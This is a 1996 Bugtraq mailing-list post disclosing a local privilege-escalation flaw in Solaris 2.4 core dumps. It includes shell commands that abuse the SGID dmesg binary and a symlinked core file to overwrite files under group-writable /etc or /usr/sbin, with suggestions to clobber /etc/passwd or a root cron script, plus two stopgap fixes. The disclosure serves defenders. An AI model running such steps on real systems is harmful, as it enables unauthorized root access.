From proff  Sun Aug  4 17:15:33 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id RAA29562 for best-of-security; Sun, 4 Aug 1996 17:15:33 +1000
Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id RAA29357 for <proff@SUBURBIA.NET>; Sun, 4 Aug 1996 17:08:46 +1000
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <23726-752>; Sun, 4 Aug 1996 03:08:15 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id DAA20181; Sun, 4 Aug 1996 03:03:37 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 204945 for BUGTRAQ@NETSPACE.ORG; Sun, 4 Aug 1996 02:16:02
          +2000
Received: from underground.org (underground.org [206.170.116.50]) by
          netspace.org (8.7/8.6.12) with ESMTP id CAA17611 for
          <bugtraq@netspace.org>; Sun, 4 Aug 1996 02:15:46 -0400
Received: (from aleph1@localhost) by underground.org (8.7.1/8.7.1) id WAA23505;
          Sat, 3 Aug 1996 22:51:03 -0700
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By:  Aleph One <aleph1@UNDERGROUND.ORG>
Message-ID: <Pine.LNX.3.91.960803224059.23451B-100000@underground.org>
Date: 	Sat, 3 Aug 1996 22:50:48 -0700
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
Sender: proff
From: Aleph One <aleph1@underground.org>
Subject:      Exploiting Zolaris 2.4 ??  :)
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

From: Jungseok Roh <beren@cosmos.kaist.ac.kr>


 I think this bug is widely spreaded in Korea . but not all over the world.
 The following contents are wholly from SeokChan Lee,  one of the best alu
 mnus of the legendaray security task force team .K** .
 Also whom I look up to ..:)

 The problem is the Core dump system of Zolaris 2.4 .
 let's look into the man page of core(4) . and then concentrate on one phr-
 ase .

core(4)                   File Formats                    core(4)
NAME
     core - core image file
DESCRIPTION
     The operating system writes out a core image  of  a  process
     when  it  is  terminated due to the receipt of some signals.
     The core  image  is  called  core  and  is  written  in  the
     process's  working  directory  (provided  it  can be; normal
     access controls apply).  A process with an effective user ID
     different  from  the  real  user  ID will not produce a core
     image.

  NOTICE the last phrase !!

  A PROCESS with an effective user ID different from the real user ID will
  NOT produce a core image . That's very important in Security phase .
  If such systmem be not SET , We can make a core file anywhere ....
  Just killing the signal .. ( U knows why i use the term KILL )..

  * Now just Sightsee  the file system..
    another INTERESTING stuff in file system detected.

[cosmos:beren] uname -a
SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
[cosmos:beren] ls -ald /etc
 $)C
   8 drwxrwxr-x  25 root     sys         3584  7 ?y  25 @O   18:46 /etc/
[cosmos:beren] ls -ald /usr
   2 drwxrwxr-x  30 root     sys         1024  7 ?y   5 @O   17:26 /usr/
[cosmos:beren] ls -ald /usr/sbin
  10 drwxrwxr-x   4 root     bin         4608  5 ?y  18 @O   03:38 /usr/sbin/
[cosmos:beren] ls -ald /usr/sbin
  10 drwxrwxr-x   4 root     bin         4608  5 ?y  18 @O   03:38 /usr/sbin/

  ****  It's GROUP WRITABLE !!  *****

  Most of u guys know what I about to say ..
  Main Idea is ..
  "Let's stab that file system at back using the sword , SGIDed utils.. "
  then let's traverse the file system and then take the sword ..

[cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) -ls
  ...

  its sword family is dmesg , netstat and all that .
  then take "dmesg" as the sword .

[cosmos:beren] ls -al /usr/sbin/dmesg
  12 -r-xr-sr-x   1 bin      sys         5520 1994  Jul 15 /usr/sbin/dmesg*

  It's sys SGIDed.

[cosmos:beren] ln -s /etc/SOMETHING core
[cosmos:beren] stty ^\^\
[cosmos:beren] pwd
/tmp
[cosmos:beren] dmesg
/* then slightly after u type this command kill it . using stty ^\^\
   there comes the following results */
^C (Core dumped)
[comos:beren] ls /etc/SOMETHING
SOMETHING

like this way u can overwrite /etc/passwd or do any operation on them.
if u runs sparc Zolaris 2.4 look at the root's crontab file .
see it ..! definately it contains the next phrase ..

# The rtc command is run to adjust the real time clock if and when
1 2 * * * [ -x /usr/sbin/rtc ] && /usr/sbin/rtc -c > /dev/null 2>&1

rtc is used in zolaris x86.

so u can make /usr/sbin/rtc as the exploitation script . and can do anythin.

U Can fix this problem.. "Two ways.."
but These two TEMPORARY FIXING has drawbacks on its phase.

1. Just blow up the Group - writable bit on each file system..
  ** but there occurs  a problem when PATCH is needed..
   I don't know what problem would be occur ..
   but the GURU seokchan Lee notified me that .

2. echo "set coredefault=0" >> /etc/system
  ** but it makes CoreDump disable..
   might be Not a good method if you develop somethin. and wanna view core.

 I don't know sun made a patch on this effect.
 It doesn't work on Zolaris 2.5 .. I tested it.

__

  Beren .. it the lost tales ....

 JungSeok Roh /  Junior in KAIST management Dep. / beren@cosmos.kaist.ac.kr